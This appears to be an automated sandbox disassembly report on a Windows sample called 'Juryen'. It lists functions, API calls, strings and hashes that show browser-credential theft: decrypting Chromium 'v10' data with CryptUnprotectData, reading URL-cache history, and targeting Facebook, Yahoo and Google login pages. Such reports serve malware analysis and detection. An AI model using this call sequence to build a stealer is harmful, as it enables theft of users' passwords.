                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                    • memset.MSVCRT ref: 0040B851
                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                    • memset.MSVCRT ref: 0040BB53
                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                    • String ID: chp$v10
                                                                    • API String ID: 1297422669-2783969131
                                                                    • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                    • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                    • String ID:
                                                                    • API String ID: 3715365532-3916222277
                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                    • String ID: bhv
                                                                    • API String ID: 4234240956-2689659898
                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2941347001-70141382
                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                    • String ID: visited:
                                                                    • API String ID: 2470578098-1702587658
                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 free 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E28B
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                    • API String ID: 2804212203-2982631422
                                                                    • Opcode ID: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                    • Opcode Fuzzy Hash: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040BC75
                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 115830560-3916222277
                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError free 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 792 418506-418515 free 787->792 788->787 792->772
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                    • free.MSVCRT ref: 0041848B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile$ErrorLastfree
                                                                    • String ID: |A
                                                                    • API String ID: 77810686-1717621600
                                                                    • Opcode ID: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                    • Opcode Fuzzy Hash: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041249C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                    • String ID: r!A
                                                                    • API String ID: 2791114272-628097481
                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                    • API String ID: 2936932814-4196376884
                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                    Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A824
                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                    • wcscpy.MSVCRT ref: 0040A854
